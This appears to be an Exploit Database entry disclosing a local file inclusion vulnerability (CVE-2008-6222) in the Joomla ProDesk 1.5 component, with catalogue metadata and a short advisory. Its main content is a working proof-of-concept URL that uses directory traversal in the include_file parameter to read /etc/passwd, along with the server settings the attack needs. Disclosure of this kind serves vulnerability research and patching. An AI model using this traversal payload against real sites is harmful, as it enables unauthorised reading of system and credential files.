Joomla! Component ProDesk 1.5 - Local File Inclusion

Author: d3v1l
type: webapps
platform: php
port: 
date_added: 2010-11-08  
date_updated: 2016-12-20  
verified: 1  
codes: CVE-2008-6222;OSVDB-49530  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 15460.txt  
[~]-------------------------------------------------------------------------------------------------------
[~] Joomla Component ProDesk v 1.5 (com_pro_desk&include_file) Local File Inclusion
[~]
[~] http://joomlashowroom.com
[~]
[~] Price - $ 49.99
[~] ----------------------------------------------------------------------------------------------------
[~] Bug founded by d3v1l [Avram Marius]
[~]
[~] Date: 7.11.2010
[~]
[~] http://security-sh3ll.blogspot.com | http://twitter.com/securityshell
[~]
[~] -----------------------------------------------------------------------------------------------------
[~] Poc :-
[~]
[~] http://site.com/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
[~]
[~] Note :-
[~]
[~] Need: magic_quotes=OFF - Need: disable_functions=ini_set
[~]-------------------------------------------------------------------------------------------------------